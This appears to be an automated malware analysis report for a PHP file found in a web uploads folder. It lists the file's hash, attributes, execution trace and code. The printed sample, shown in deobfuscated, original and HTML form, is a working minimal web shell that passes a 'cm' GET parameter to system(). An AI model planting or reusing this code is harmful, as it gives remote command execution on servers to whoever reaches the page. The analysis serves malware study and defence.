PHP Malware Analysis
00000000ax.php
md5: 56ab6f516292b75c4966b86571ce50d9
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, HTML, Original)
Input
- _GET (Deobfuscated, HTML, Original)
Deobfuscated PHP code
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}Execution traces
data/traces/56ab6f516292b75c4966b86571ce50d9_trace-1676238891.6548.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:55:17.552652]
1 0 1 0.000187 393528
1 3 0 0.000231 393248 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
1 3 1 0.000248 393248
0.000272 314240
TRACE END [2023-02-12 19:55:17.552821]
Generated HTML code
<html><head></head><body>echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}</body></html>Original PHP code
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}